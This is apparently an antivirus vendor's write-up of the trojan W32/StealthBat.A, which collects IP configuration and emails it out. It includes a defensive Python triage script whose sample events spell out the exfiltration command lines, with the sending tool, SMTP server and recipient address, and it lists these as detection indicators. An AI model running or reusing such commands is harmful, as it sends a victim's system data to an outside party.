W32/StealthBat.A!tr
Analysis
W32/StealthBat.A!tr - 06-04-04
General Info:
This threat is a "PE" executable file with a file size of 14848.
Files:
- Drop files: data + other files
Installation to System:
- Drops the following files:
  C:\Temp\~systmp.bat
  C:\Temp\body.txt
More Info:
This trojan drops the batch file ~systmp.bat in the C:\Temp folder, if it exists. The batch file attempts to run the following programs from the C:\Temp folder: sleep.exe, run.exe, end.exe, scvhost.exe, and send.exe. It uses ipconfig.exe to collect the IP configuration and Ethernet adapter information of the system it is running on, and stores this data in the file body.txt. It then attempts to send this text file to the email address daslick@charter.net using the server smtp.charter.net. It deletes itself after executing.
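The behaviour described above can be turned into a host triage check. The following is an added example, not part of the original write-up: it correlates the indicators named in the description across endpoint events and reports a host only when several indicator classes co-occur. The event schema (host, type, path, cmdline) and the sample command lines are constructed assumptions.

```python
import ntpath
from collections import defaultdict

# Indicators taken from the description above.
STAGING_DIR = r"c:\temp"
DROPPED = {"~systmp.bat", "body.txt"}
HELPERS = {"sleep.exe", "run.exe", "end.exe", "scvhost.exe", "send.exe"}
EXFIL = ("smtp.charter.net", "daslick@charter.net")

def match(event):
    """Return the set of indicator classes a single event matches."""
    path = event.get("path", "").lower()
    cmd = event.get("cmdline", "").lower()
    in_staging = ntpath.dirname(path) == STAGING_DIR
    name = ntpath.basename(path)
    hits = set()
    if event["type"] == "file_create" and in_staging and name in DROPPED:
        hits.add("dropped_file")
    if event["type"] == "process_create":
        if in_staging and name in HELPERS:
            hits.add("helper_from_temp")
        if "ipconfig" in cmd and "body.txt" in cmd:
            hits.add("ipconfig_to_body")
        if any(s in cmd for s in EXFIL):
            hits.add("exfil_target")
    return hits

def triage(events, threshold=2):
    """Group hits per host; report hosts with >= threshold distinct classes."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]] |= match(ev)
    return {h: sorted(c) for h, c in per_host.items() if len(c) >= threshold}

# Constructed sample events (hypothetical schema and command lines).
SAMPLE = [
    {"host": "ws01", "type": "file_create", "path": r"C:\Temp\~systmp.bat"},
    {"host": "ws01", "type": "process_create", "path": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c ipconfig > C:\Temp\body.txt"},
    {"host": "ws01", "type": "process_create", "path": r"C:\Temp\send.exe",
     "cmdline": r"C:\Temp\send.exe smtp.charter.net daslick@charter.net body.txt"},
    # Single weak matches stay below the threshold and are not reported.
    {"host": "ws02", "type": "file_create", "path": r"C:\Temp\body.txt"},
    {"host": "ws03", "type": "process_create", "path": r"C:\Tools\sleep.exe",
     "cmdline": "sleep.exe 5"},
]

if __name__ == "__main__":
    for host, classes in triage(SAMPLE).items():
        print(host, classes)
```

Requiring two or more classes keeps generic names such as body.txt or sleep.exe from flagging a host on their own.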
Detection Availability
Product | Availability
---|---
FortiGate | Extreme
FortiClient | Extended
FortiMail | Extended
FortiSandbox | Extended
FortiWeb | Extended
Web Application Firewall | Extended
FortiIsolator | Extended
FortiDeceptor | Extended
FortiEDR |